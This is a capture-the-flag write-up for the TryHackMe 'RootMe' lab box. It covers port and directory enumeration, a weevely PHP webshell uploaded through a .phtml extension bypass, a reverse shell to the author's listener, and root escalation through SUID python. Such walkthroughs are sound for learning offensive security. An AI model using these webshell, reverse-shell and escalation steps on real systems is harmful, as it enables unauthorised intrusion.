writeups

RootMe - Write-up - TryHackMe

noraj (Alexandre ZANNI)
, , , , , , ,
🇬🇧

Information

Room#

  • Name: RootMe
  • Profile: tryhackme.com
  • Difficulty: Easy
  • Description: A ctf for beginners, can you root me?

RootMe

Write-up

Overview#

Install tools used in this WU on BlackArch Linux:

1
$ sudo pacman -S nmap ffuf seclists weevely gtfoblookup

Network enumeration#

Service scn with nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Nmap 7.91 scan initiated Fri Mar 19 11:48:02 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.80.74
Nmap scan report for 10.10.80.74
Host is up (0.085s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 19 11:50:31 2021 -- 1 IP address (1 host up) scanned in 149.40 seconds

Web enumeration#

Let's find hidden directories:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ ffuf -u http://10.10.156.75/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.156.75/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

uploads                 [Status: 301, Size: 314, Words: 20, Lines: 10]
panel                   [Status: 301, Size: 312, Words: 20, Lines: 10]
css                     [Status: 301, Size: 310, Words: 20, Lines: 10]
js                      [Status: 301, Size: 309, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
                        [Status: 200, Size: 616, Words: 115, Lines: 26]

There is an upload form at /panel/.

Web exploitation#

The file /index.php let us know that the app is in PHP.

Uploading a .png image is allowed but not a php file (.php).

Let's generate a webshell:

1
$ weevely generate noraj agent.php

We can bypass the upload by using the .phtml extension.

1
2
3
4
5
6
7
8
9
10
11
12
weevely http://10.10.156.75/uploads/agent.phtml noraj

[+] weevely 4.0.1

[+] Target:     10.10.156.75
[+] Session:    /home/noraj/.weevely/sessions/10.10.156.75/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Let's obtain a reverse shell from our web shell:

1
www-data@rootme:/var/www/html/uploads $ :backdoor_reversetcp 10.9.19.77 9999

On my machine:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ pwncat -lvv 9999
INFO: Listening on :::9999 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.156.75:49816 (family 2/IPv4, TCP)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ find / -type f -name user.txt 2>/dev/null
/var/www/user.txt

$ cat /var/www/user.txt
THM{edited}

System enumeration#

Let's find SUID binaries:

1
2
3
4
5
6
7
8
9
10
11
$ find / -type f -user root -perm -u=s 2>/dev/null
...
/usr/bin/chsh
/usr/bin/python
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
...

/usr/bin/python should not have the SUID flag.

We can consult GTFObin:

1
2
3
4
5
6
7
$ gtfoblookup linux suid python
python:

    suid:

        Code: ./python -c 'import os; os.execl("/bin/sh", "sh",
              "-p")'

Let's get our privileged shell:

1
2
3
4
5
6
7
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

cat /root/root.txt
THM{edited}
Share